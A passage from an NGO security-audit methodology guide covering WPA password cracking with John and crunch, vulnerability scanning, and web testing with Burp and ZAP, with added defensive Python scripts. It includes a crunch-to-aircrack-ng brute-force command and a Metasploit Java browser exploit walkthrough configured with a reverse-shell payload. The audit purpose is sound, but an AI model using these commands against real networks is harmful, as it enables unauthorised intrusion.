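def build_wordlist(keywords, fragments, founding_year, last_year, first_year=2001):
    """Base dictionary: keywords, fragments, four-digit years from first_year
    to last_year (the text's field-experience rule) and the founding year.
    Lowercased, because case-toggling rules are cheap for an attacker."""
    years = {str(y) for y in range(first_year, last_year + 1)} | {str(founding_year)}
    return {w.lower() for w in keywords} | {w.lower() for w in fragments} | years


def _stem_hits(stem, words):
    """Explain how `stem` is covered by the dictionary, or return None."""
    for variant, how in ((stem, "as-is"), (stem.translate(UNLEET), "after undoing l33t")):
        if variant in words:
            return f"'{variant}' is a dictionary word ({how})"
        # Combinator attack: any two dictionary entries glued together.
        for k in range(1, len(variant)):
            if variant[:k] in words and variant[k:] in words:
                return f"'{variant[:k]}' + '{variant[k:]}' is a combinator pair ({how})"
    return None


def check_password(password, words):
    """Return a human-readable reason the password is weak, or None if it
    survives the dictionary and rule families modelled here."""
    low = password.lower()
    # Try every split into stem + cheap suffix, shortest stem first.
    for i in range(1, len(low) + 1):
        stem, suffix = low[:i], low[i:]
        if not SUFFIX_RE.match(suffix):
            continue
        hit = _stem_hits(stem, words)
        if hit:
            return hit + (f", plus appended '{suffix}'" if suffix else "")
    return None


# Last year is fixed so the demo is reproducible; a real run would use today's year.
WORDS = build_wordlist(CONTEXT_KEYWORDS, COMMON_FRAGMENTS, founding_year=1992, last_year=2024)

if __name__ == "__main__":
    for candidate in ["ExampleOrg1992", "Journ0Rights!", "C3ntral2023",
                      "qwerty123", "Tq7#vLp9zR2m"]:
        verdict = check_password(candidate, WORDS)
        print(f"{candidate:16} -> {verdict or 'not covered by this dictionary'}")
```

A None result only means the key survives the contextual dictionary modelled here; a real check would merge in the language dictionaries and the full KoreLogic rule set before declaring a key acceptable.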

Brute force, using John and crunch

JtR's "incremental" mode is essentially an optimized brute force attack, so will take a very long time for anything but the shortest passwords, or passwords where you can limit the search space to a character set: "As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download." (http://www.openwall.com/john/doc/MODES.shtml)

As a last resort, you can try a direct brute force attack overnight or post-audit to fill in details on key strength. Crunch is a very simple but thorough approach. Given enough time it will break a password, but it's not particularly fast, even at simple passwords. You can reduce the scope of this attack (and speed it up) if you have a reason to believe the password is all lower-case, all-numeric, or so on. WPA passwords are a minimum of 8 characters, a maximum of 16, and some wifi routers will accept punctuation, but in practice these are usually just [email protected]#$. — so:

$ /path/to/crunch 8 16 a[email protected]#$. | aircrack-ng -a 2 path/to/capture.pcap -b 00:11:22:33:44:55 -w -

This says to try every possible alpha-numeric combination from 8 to 16 characters. This will take a very, very, very long time.

Further Resources

Sample Practice

For practice on any of these methods, you can use the wpa-Induction.pcap file from Wireshark.

https://www.schneier.com/blog/archives/2014/03/choosing_secure_1.html

http://zed0.co.uk/crossword/

http://www.instantcheckmate.com/crimewire/is-your-password-really-protecting-you/#lightbox/0/

Note that password cracking systems are rated on the number of password guesses they make per second. Stock laptop computers without high-end graphics cards or any other optimizations can guess 2500 passwords/second. More powerful desktop computers can test over a hundred million each second, and with graphics cards (GPUs) that rises to billions of passwords per second. (https://en.wikipedia.org/wiki/Password_cracking).

This website has a good explanation about how improving the complexity of a password affects how easy it is to break: http://www.lockdown.co.uk/?pg=combi, but it uses very out-of-date numbers; consider a basic laptop able to produce "Class E" attacks, and a desktop, "Class F".
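The guess rates quoted above, worked through as an added example (not from SAFETAG): the script computes the keyspace and worst-case exhaustion time for John's pre-defined incremental charsets across the 8-16 character range the text gives for WPA keys, and for the two forms the Recommendation suggests. The 50,000-word passphrase list size and the use of one billion guesses per second as the "billions" GPU figure are assumptions.

```python
"""Keyspace and time-to-exhaust for the password policies discussed in this
section, at the guess rates the text quotes. Added example, not SAFETAG code.
"""
import math

# Guesses per second quoted in the text; the GPU figure is the low end of "billions".
GUESS_RATES = {
    "stock laptop (no GPU)": 2_500,
    "desktop CPU": 100_000_000,
    "GPU-equipped desktop": 1_000_000_000,
}

# Charset sizes of John's pre-defined incremental modes quoted above.
INCREMENTAL_CHARSETS = {"Digits": 10, "LowerNum": 36, "Alnum": 62, "ASCII": 95}

# Assumed size of the word list a five-word passphrase is drawn from.
PASSPHRASE_DICT_SIZE = 50_000


def keyspace(alphabet_size, min_len, max_len):
    """Number of candidates of every length from min_len to max_len inclusive."""
    return sum(alphabet_size ** n for n in range(min_len, max_len + 1))


def entropy_bits(space):
    """Search space expressed in bits, for comparing policies at a glance."""
    return math.log2(space)


def human_time(seconds):
    """Render a duration in the largest sensible unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


def policies():
    """Candidate policies mapped to their keyspace: each incremental charset at
    8-16 characters, 12 random printable characters, and a 5-word passphrase."""
    spaces = {f"{name}, 8-16 chars": keyspace(size, 8, 16)
              for name, size in INCREMENTAL_CHARSETS.items()}
    spaces["12 random printable ASCII"] = keyspace(95, 12, 12)
    spaces[f"5 words from a {PASSPHRASE_DICT_SIZE:,}-word list"] = PASSPHRASE_DICT_SIZE ** 5
    return spaces


def crack_table(policy_spaces, rates):
    """Worst-case seconds to exhaust each policy at each guess rate (an attacker
    needs half of that on average, but the ordering of policies is the same)."""
    return {(pol, rig): space / rate
            for pol, space in policy_spaces.items()
            for rig, rate in rates.items()}


if __name__ == "__main__":
    spaces = policies()
    table = crack_table(spaces, GUESS_RATES)
    for pol, space in spaces.items():
        print(f"{pol:42} {entropy_bits(space):6.1f} bits")
        for rig in GUESS_RATES:
            print(f"    {rig:24} {human_time(table[(pol, rig)])}")
```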

http://rumkin.com/tools/password/passchk.php

http://cyber-defense.sans.org/blog/downloads/ has a calculator buried in the zip file "scripts.zip"

http://www.dailymail.co.uk/sciencetech/article-2331984/Think-strong-password-Hackers-crack-16-character-passwords-hour.html

https://www.grc.com/haystack.htm

https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

http://www.nytimes.com/2014/11/19/magazine/the-secret-life-of-passwords.html?_r=1

Recommendation
Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” especially from well known literature like Shakespeare or religious texts, and should not include number sequences or phrases either, especially if they are related to the organization, its employees or its work. A unique password should be used for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

Monitor open wireless traffic

Covered in full in Physical and Operational Security

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Physical Security Guided Tour

Covered in full in Operational Security Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can be moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Check Browser and Plugin Vulnerabilities

Summary

Though modern browsers are better at self-updating, and the prevalence of powerful plugins like Flash and Java is slowly declining, it is valuable to ensure that the browsers in use have updated plugins and are themselves updated.

Overview
Materials Needed
Considerations
Walkthrough
Outdated Java browser plugins

While the threat described below is more severe if carried out by a local attacker (as they can more readily direct the victim to a malicious Web site), it also works remotely. In fact, if a user can be tricked, by a remote attacker, into clicking on a malicious email or Web link, attacks like this represent a significant perimeter threat. By compromising the victim’s machine, they can give the attacker a local point-of-presence without requiring the attacker to crack WPA keys or gain local access in some other way.

Step 1: Using Metasploit, an attacker can easily create an ad hoc malicious Web site:

$ msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1114 exploits - 627 auxiliary - 178 post
+ -- --=[ 307 payloads - 30 encoders - 8 nops

msf > use exploit/multi/browser/java_jre17_exec

msf exploit(java_jre17_exec) > set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp

msf exploit(java_jre17_exec) > set LHOST 192.168.1.123
LHOST => 192.168.1.123

msf exploit(java_jre17_exec) > set SRVPORT 8081
SRVPORT => 8081

msf exploit(java_jre17_exec) > set URIPATH java_test
URIPATH => java_test

msf exploit(java_jre17_exec) > run
[*] Exploit running as background job.

Step 2: At this point, any local user who visits http://192.168.1.123:8081/java_test, and who is running a sufficiently out-of-date version of the Java browser plugin, stands a good chance of giving the attacker full access to his computer:

[*] Started reverse handler on 192.168.1.123:4444

msf exploit(java_jre17_exec) >

[*] Using URL: http://0.0.0.0:8081/java_test
[*] Local IP: http://192.168.1.123:8081/java_test
[*] Server started.

msf exploit(java_jre17_exec) >

<remote shell>

Figure 1: Attacker in control of the victim’s computer through a remote command shell

Recommendation

Vulnerability Scanning and Analysis

Summary

This component has the auditor discover possible flaws in the organization's devices, services, application designs, and networks by testing and comparing them against a variety of online and offline resources (vulnerability databases, vendor advisories, and auditor investigation) to identify known vulnerabilities. Basic vulnerability analysis should be occurring alongside the other activities so that evidence can be gathered from the network; however, deeper research into specific discovered exploits can happen after the on-site audit, to take full advantage of the short time the auditor has on site.

Purpose

It is not uncommon for a cash-strapped human rights NGO to run critical infrastructure themselves on available equipment. A better-resourced organization may host its critical services at a remote data center, or outsource its IT infrastructure to cloud providers, such as Google Apps, and/or to ad-hoc services (Dropbox, Yahoo! mail, Wordpress, etc.). Regardless, it is rare to have someone designated to update and patch systems as vulnerabilities are released, or to view the services from a security -- as opposed to availability -- standpoint.

The Flow Of Information

Vulnerability Analysis Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Vulnerability Databases

Website Vulnerability Scanning

System Vulnerability Scanning

Activities

Vulnerability Scanning

Summary

While much of SAFETAG focuses on digital security challenges within and around the office, remote attacks on the organization's website, extranets, and unintended information available from "open sources" all pose real threats and deserve significant attention. SAFETAG takes great care to take a very passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns.

This activity uses active research and scanning to detect known vulnerabilities in external and key internal services. Usually penetration tests exploit possible vulnerabilities to confirm their existence. But the use of exploits puts the organization's systems at a level of increased risk that is unacceptable when neither the organization nor the auditor has the time or finances to address the issue. The SAFETAG methodology only uses relatively safe exploitation of vulnerabilities for targeted outcomes. For instance, cracking the wireless access point password allows us to demonstrate the importance of good passwords without singling out any individual's passwords.

Overview
Materials Needed
Considerations
Walkthrough

Vulnerability Scanning using OpenVAS

Setting up OpenVAS in Kali

openvas-setup
openvas-feed-update
openvas-check-setup
openvas-stop
openvas-start

Visit https://127.0.0.1:9392/ in a web browser and log in.

Using OpenVAS

Once logged in to OpenVAS, the interface is disturbingly simple to use. For most use, using the Wizard to scan the target server works best. Things to verify before doing so:

Once you start a scan, change the display to "auto refresh" to give you more feedback on the scan process. Once the scan is completed, a report can be exported in PDF form.

Common problems

* Errors during openvas-start: OpenVAS is a rather ... delicate program. Most often, the openvas-start script will not wait long enough between launching openvassd and openvasmd, causing openvasmd to error out. Re-running openvasmd often works, though an entire stop/start cycle seems to be slightly more reliable. Often, openvasmd will error out, but launch anyway. Checking the web interface at https://127.0.0.1:9392 to make sure that you can log in is the best way to check if it's actually successfully launched.

* Lost admin password: From a root command-line, you can reset the web interface's admin password:

openvasmd --create-user=admin
openvasmd --user=admin --new-password=admin

Recommendation

The auditor will need to do research and compare against the organization's capacity and risks to give specific recommendations based on the vulnerabilities discovered in the process. Some common recommendations include the following:

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but they can also be identified by checking the HTTP response headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox). See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit
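The header check described above can be done offline once the headers have been copied out of the browser's network panel. The following is an added example written for this guide (it is not SAFETAG tooling); it parses pasted response headers, looks for signs that the site sits behind a fronting service, and flags the things a webmaster would want fixed. The Cloudflare header names (Server: cloudflare, CF-RAY, CF-Cache-Status) are ones Cloudflare publicly documents; the Deflect banner check is an assumption to be confirmed against Deflect's wiki, and the two sample header sets are constructed, not captured from any real site.

```python
"""Offline triage of a website's HTTP response headers.

Added example for the SAFETAG web recommendations; not SAFETAG's own code.
Input is the text an auditor copies from the browser's response-headers panel.
"""
import re

# (provider, header name, regex on the header value). The Cloudflare entries
# use headers Cloudflare documents; the Deflect banner test is an ASSUMPTION.
FRONTING_INDICATORS = [
    ("Cloudflare", "server", r"^cloudflare"),
    ("Cloudflare", "cf-ray", r"."),
    ("Cloudflare", "cf-cache-status", r"."),
    ("Deflect (assumed banner check)", "server", r"deflect"),
]

# Matches a version suffix such as Apache/2.4.7 or PHP/5.5.9
VERSION_RE = re.compile(r"/\d+(?:\.\d+)+")


def parse_raw_headers(raw):
    """Turn pasted header text into a dict with lower-cased names.
    The status line is skipped; repeated headers are joined with ', '."""
    headers = {}
    for line in raw.splitlines():
        line = line.strip()
        if not line or line.upper().startswith("HTTP/"):
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return headers


def analyse_headers(headers):
    """Report fronting services seen and basic hygiene findings."""
    providers = set()
    for provider, hname, pattern in FRONTING_INDICATORS:
        if hname in headers and re.search(pattern, headers[hname], re.IGNORECASE):
            providers.add(provider)

    findings = []
    banner = headers.get("server", "") + " " + headers.get("x-powered-by", "")
    if VERSION_RE.search(banner):
        findings.append("software versions disclosed in Server/X-Powered-By")
    if "strict-transport-security" not in headers:
        findings.append("no Strict-Transport-Security: browsers may still be sent over clear HTTP")
    csp = headers.get("content-security-policy", "")
    if "x-frame-options" not in headers and "frame-ancestors" not in csp:
        findings.append("no framing protection (X-Frame-Options or CSP frame-ancestors)")
    return {"fronting": sorted(providers), "findings": findings}


def triage(raw):
    return analyse_headers(parse_raw_headers(raw))


# Constructed sample header sets (not from any real site)
EXPOSED_SITE = """\
HTTP/1.1 200 OK
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9
Content-Type: text/html
"""

FRONTED_SITE = """\
HTTP/1.1 200 OK
Server: cloudflare
CF-RAY: 0000000000000000-EXAMPLE
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: frame-ancestors 'none'
Content-Type: text/html
"""

if __name__ == "__main__":
    for label, raw in (("exposed", EXPOSED_SITE), ("fronted", FRONTED_SITE)):
        result = triage(raw)
        print(f"[{label}] behind: {result['fronting'] or 'nothing detected'}")
        for f in result["findings"]:
            print(f"    - {f}")
```

A site that reaches the browser with a version-bearing Server banner and no HSTS header gives the auditor two concrete recommendations at once; a site fronted by a mitigation service will usually show the provider's headers instead of the origin banner, which is itself worth recording in the report.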

If an organization updates their website via FTP, it is worth noting that FTP is similarly insecure. Many hosting providers offer SFTP or FTPS (two different, but secure, FTP variants) or secure WebDAV to upload files. These should be used, turning "plain" FTP off altogether if possible.

When switching to SSL/Secure FTP after having used the plain versions, webmasters should also update all administrative passwords, and watch to make sure that no step along the way (hosting provider management/panel, file upload, CMS editing) goes over “clear” channels.

Vulnerability Research

Summary
Overview
Materials Needed
Considerations
Walkthrough

After completing an automated vulnerability scan (network, system, webapp) and documenting findings, you can now move into vulnerability research:

Validation: Each of your findings, once reviewed and documented, will be enough for your report. However, if you and the organization agreed to verify that the findings and vulnerabilities truly exist, you may refer to the Penetration Testing resources within the SAFETAG framework.

Recommendation

Website Footprinting

See Website Footprinting in Recon for passive / lightweight investigation tools

Web Vulnerability Assessment

Summary

Organizational websites are often a central part of their work, but resource constraints can leave them vulnerable to a wide variety of attacks, from simple DDoS (Distributed Denial of Service) attacks to being leveraged for online scams and malicious advertising to targeted destruction and subversion. Insecure websites can even be used in "watering hole" attacks where malware is implanted into the site to intentionally target the website's audience.

This activity provides a SAFETAG auditor with a suite of processes and tools to investigate organization and project websites for potential vulnerabilities. There are multiple ways to do this, from passive to more active scanning. SAFETAG takes great care to take a primarily passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns. Care should be taken to review operational security concerns, work closely with the organization, and pursue a minimal approach focused on the priorities of the organization. See also the Vulnerability Scanning activity for additional tools and approaches useful for investigating outside of the website itself, at the server level.

Overview
Materials Needed
Considerations
Walkthrough

Web vulnerability assessment can be performed in different ways, with different tools and with different results. The choice among these steps or guides should not confuse an auditor; rather, it provides a broader scope that should help them find as many vulnerabilities as they can.

These vulnerabilities can range across:
    • Web Server/OS level vulnerabilities
    • Access control vulnerabilities
    • Application-specific vulnerabilities
    • Misconfiguration
    • SQL Injection
    • Cross-site Scripting
    • Directory Traversal
    • Failure to restrict URL Access
    • Insufficient Transport Layer Protection
    • LDAP Injections
    • Malicious Code
    • Leaked information

Before pursuing any of these more active scans, review outputs from passive reconnaissance, DNS history and current information, and (if relevant) CMS version checking. This guide covers a small subset of web vulnerability scanning tools; a more comprehensive list is available at https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools, which may provide approaches better suited to specific situations.

OpenVAS, covered in the Vulnerability Scanning activity, also includes Wapiti, which can help to detect many of the above common vulnerabilities.


Manual Testing with Burp (Active)

Introduction

According to Burp's official documentation, "Burp Suite is an integrated platform for performing security testing of web applications. It is not a point-and-click tool, but is designed to be used by hands-on testers to support the testing process. With a little bit of effort, anyone can start using the core features of Burp to test the security of their applications. Some of Burp's more advanced features will take further learning and experience to master." To know more about BurpSuite's other tools and features, visit BurpSuite's Tools and its functions pages.

Requirements

Note: If you are using Kali Linux, you already have Burpsuite pre-installed. Otherwise if you do not have a Linux box, refer to the following requirements below:

All of this investment is hugely worth it - Burp's user-driven workflow is by far the most effective way to perform web security testing, and will take you way beyond the capabilities of any conventional point-and-click scanner. Burp is intuitive and user-friendly, and the best way to start learning is by doing. These steps will get you started with running Burp and using its basic features. You can then read on deeper into the documentation to become more proficient in using this supremely powerful tool.

Burp Suite contains various tools for performing different testing tasks. The tools operate effectively together, and you can pass interesting requests between tools as your work progresses, to carry out different actions.


Burp's Getting Started Documentation is quite detailed and useful, and strongly recommends launching Burp from the command line for better control. In specific, it recommends assigning the amount of memory you wish to dedicate to burp:

Launching Burpsuite

With Java installed, on some platforms you may be able to run Burp directly by double-clicking the Burp JAR file. However, it is preferable to launch Burp from the command line, as this gives you more control over its execution, in particular the amount of memory that your computer assigns to Burp. To do this, in your command prompt type a command like:

java -jar -Xmx1024m /path/to/burp.jar

where 1024 is the amount of memory (in MB) that you want to assign to Burp, and /path/to/burp.jar is the location of the Burp JAR file on your computer.

The troubleshooting help can help if Burp doesn't appear shortly.

Setting up your environment

Testing Burpsuite Configuration

NOTE: Scanning web applications without the owner's permission is potentially illegal. It is important that you test Burpsuite on your own web applications, or on a controlled environment. There are some publicly available websites that are insecure by default to be used for testing and learning purposes. Among these were:

(You can use these sites to get familiar with Burpsuite and to perform the following exercises in this guide.)

Intercepting Request

Adding Target/Scope
    • Adding your target to the scope is important so you won't miss, or even scan, URLs that are not included in your list of targets.
    • To add the target to your scope, right-click the domain/website, then select Add to Scope.
    • Burp will now ask whether you want to stop sending out-of-scope items to your HTTP history tab and other Burp tools; click Yes.
    • The target will now appear in your Target tab, under the Scope sub-tab.
    • To add subdomains to your scope, you can use a regex: .*\.test\.com$
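Scope regexes are easy to get subtly wrong, and a scanner pointed at an out-of-scope host is exactly the unintended consequence this activity warns about. The following is an added example written for this guide (not Burp's own code) that evaluates a list of candidate hostnames against include and exclude patterns the way the scope rule above is meant to work, so an auditor can see before scanning that `.*\.test\.com$` covers subdomains but not the apex `test.com`, and does not cover lookalike hosts. The hostnames are constructed; the assumptions are that Burp matches the pattern case-insensitively and that a host is in scope when any include pattern matches and no exclude pattern does.

```python
r"""Which hosts a Burp scope regex such as .*\.test\.com$ actually covers.

Added example for this guide, not Burp's code. Patterns are regexes as typed
into Burp's Target > Scope "Host or IP range" field.
"""
import re


def in_scope(host, include, exclude=()):
    """True when host matches any include pattern and no exclude pattern.

    ASSUMPTION: matching is case-insensitive and a pattern may match anywhere
    in the hostname; the leading .* in the guide's example makes the result
    the same under either anchoring convention."""
    h = host.strip().lower().rstrip(".")

    def matches(pattern):
        return re.search(pattern, h, re.IGNORECASE) is not None

    return any(matches(p) for p in include) and not any(matches(p) for p in exclude)


def scope_report(hosts, include, exclude=()):
    """Map each candidate host to its in-scope decision."""
    return {h: in_scope(h, include, exclude) for h in hosts}


# Constructed hostnames (none of these are real targets)
CANDIDATES = [
    "www.test.com",            # subdomain: covered by the guide's regex
    "api.test.com",            # subdomain: covered
    "test.com",                # apex domain: NOT covered, needs its own entry
    "evil-test.com",           # lookalike: not covered
    "www.test.com.other.example",  # suffix lookalike: not covered thanks to $
    "staging.test.com",        # covered by include, removed by exclude below
]
INCLUDE = [r".*\.test\.com$", r"^test\.com$"]   # second entry adds the apex
EXCLUDE = [r"^staging\."]                        # keep fragile hosts out

if __name__ == "__main__":
    for host, ok in scope_report(CANDIDATES, INCLUDE, EXCLUDE).items():
        print(f"{'IN ' if ok else 'OUT'}  {host}")
```

Run this over the organization's full host list (from the recon and DNS work) before enabling any active tool, and keep the exclude list for hosts the organization has asked you not to touch.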

Managing Burp Projects
    • Managing Burp Suite projects will depend on the version you are using. Some features are not available in the free version of Burp, but only in the Pro version. See Burp's documentation for managing projects here.
    • Selecting project type:
        • Temporary project: quick tasks, no need to save data
        • New project on disk: creates a new project and stores it on disk in a "Burp project file"
        • Open existing project: opens a recent existing project from a "Burp project file". Scanners and spiders are paused.

NOTE: According to BurpSuite documentation, "If you open an existing project that was created by a different installation of Burp, then Burp will prompt you to decide whether to take full ownership of the project.

This decision is needed because Burp stores within the project file an identifier that is used to retrieve any ongoing Burp Collaborator interactions that are associated with the project. If two instances of Burp share the same identifier in ongoing work, then some Collaborator-based issues may be missed or incorrectly reported. You should only take full ownership of a project from a different Burp installation if no other instance of Burp is working on that project."

Since Burpsuite is an advanced tool for testing web applications, this guide will cover only the basic testing activities for Burpsuite. To use the advanced features, you will need a licensed version.

Basic BurpSuite Testing Exercises:

Attacking a web application using a simple payload set (brute-force attack):
    • Verify that your Burp is working
    • You must first test whether your Burp and browser are both configured

Take note of these errors to see how the target web application responds when given certain types of strings.

Setting up your environment

Selecting a Project

Selecting a Configuration

Opening a Project From a Different Burp Installation

Display Settings

The Basics of Using Burp

OWASP ZAP (Active)

OWASP ZAP allows an auditor to quickly identify common web vulnerabilities using the OWASP framework - either by a relatively intense spidering of the website or through a more tailored use of the proxy functionality of the tool.

OWASP ZAP provides a highly configurable tool to test for common website vulnerabilities. In addition to supporting organizational change toward general best practices for websites, ZAP can expose more specific vulnerabilities that may warrant action above and beyond general best practice work.

For a website that can be expected to withstand a dedicated spidering of its content, the automated mode will dig through and expose common vulnerabilities. The tool itself is relatively easy to use.

For more delicate sites, private sites, or other situations, ZAP can also proxy your web browser and test the pages you click through.

Quick Guide Setting up OWASP Zaproxy Scanner:

  1. Download the latest version of Zaproxy from: https://github.com/zaproxy/zaproxy/wiki/Downloads

  2. After installation, you will be brought into the OWASP Zaproxy's Session management page.
    • Yes, I want to persist this session with name based on the current timestamp
    • Yes, I want to persist this session but I want to specify the name and location
    • No, I don't want to persist this session at this moment in time
    • Remember my choice and do not ask me again

Note: By default, ZAP sessions are always recorded to disk in a HSQLDB database with a default name and location. If you do not persist the session, those files are deleted when you exit ZAP.

ZAP User Interface:

The ZAP user interface consists of the following parts:

Option              Description
Menu Bar            Provides access to many of the automated and manual tools
Toolbar             Includes buttons which provide easy access to the most commonly used features
Tree Window         Displays the Sites tree and the Scripts tree
Workspace Window    Displays requests, responses, and scripts and allows you to edit them
Information Window  Displays details of the automated and manual tools
Footer              Displays a summary of the alerts found and the status of the main automated tools

Running Assessment:

Before you can run your assessment in ZAP, you need to configure your browser to use ZAP as its proxy. By default, ZAP uses:

Address: localhost, Port: 8080

Note: Remember that Burpsuite also uses the same address and port number. Be sure to close whichever of the two applications you are not using.
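Because Burp and ZAP both default to 127.0.0.1:8080, and the OpenVAS web interface described earlier is expected at 127.0.0.1:9392, a quick check of which of those ports is already taken saves a confusing failure (the second proxy refuses to start, or the browser silently talks to the wrong tool). The following is an added example written for this guide, not part of Burp, ZAP or OpenVAS: it tries a TCP connection to each expected port and reports whether something is listening. Port numbers are the defaults quoted in this guide; the labels next to them are assumptions, and open_listener() exists only to stand in for an already-running tool when trying the script out.

```python
"""Report which local ports the audit tools expect are already in use.

Added example for this guide (not Burp, ZAP or OpenVAS code). A successful
TCP connect to 127.0.0.1:<port> means some program is already listening.
"""
import socket

# Defaults quoted in the guide; the tool labels are an ASSUMPTION
EXPECTED_PORTS = {
    8080: "Burp Suite / OWASP ZAP proxy listener (both default to this port)",
    9392: "OpenVAS web interface",
}


def port_in_use(port, host="127.0.0.1", timeout=0.5):
    """True if something accepts TCP connections on host:port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def check_ports(ports=None, host="127.0.0.1"):
    """Map port -> (label, in_use) for every port we care about."""
    ports = EXPECTED_PORTS if ports is None else ports
    return {port: (label, port_in_use(port, host)) for port, label in ports.items()}


def open_listener(host="127.0.0.1"):
    """Bind a throwaway listener on a free port, standing in for a tool that
    is already running. Returns (socket, port); close the socket to free it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    s.listen(1)
    return s, s.getsockname()[1]


def main():
    for port, (label, busy) in check_ports().items():
        state = "IN USE" if busy else "free"
        print(f"127.0.0.1:{port}  {state:6}  {label}")
        if busy and port == 8080:
            print("    -> stop the proxy you are not using before starting the other")


if __name__ == "__main__":
    main()
```

Run it once before launching the second tool; if 8080 shows as in use while you expect it to be free, find and close the other proxy (or move one of them to a different port in its proxy settings) rather than guessing which one the browser is actually talking to.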

Since ZAP is acting as a proxy between your browser and the web application, the use of SSL (HTTPS) may cause certificate validation to fail and the connection to be terminated. This happens because ZAP decrypts and re-encrypts the traffic sent to the web application instead of passing the web application's original certificate through to the browser. This is done so ZAP can access the plaintext in the request and the response.

To prevent this, ZAP automatically creates an SSL certificate for each host you access, signed by ZAP's CA certificate. To set up your browser to trust these SSL certificates, you need to import and trust the ZAP root CA certificate. Once that is done, the other ZAP certificates signed by it will be trusted as well.

Keep the self-generated Root CA certificate to avoid creating a vulnerability.

  1. Start ZAP and click Tools -> Options.
  2. On the left pane of the Options window, click Dynamic SSL Certificates.
  3. On the right pane, click Save.
  4. Select a location to save the certificate to and click Save. Be sure to retain the .cer file extension.

To install the ZAP Root CA certificate as trusted root certificate for Windows/Chrome:

  1. Browse to the certificate file location.
  2. Right-click on the certificate file and then click Install Certificate.
  3. In the Certificate Import Wizard, select either Current User or Local Machine as the scope of the certificate, then click Next.
  4. Select Place all certificates in the following store.
  5. Click Browse and select Trusted Root Certificate Authorities or Trusted Root Certificates (depending on your version of Windows) as the certificate store, then click Next.
  6. Click Finish.
  7. Review the security warning about trusted root certificates and click Yes if the warning is accepted.

To verify that the ZAP Root CA certificate is installed:

  1. Open Control Panel and click Internet Options.
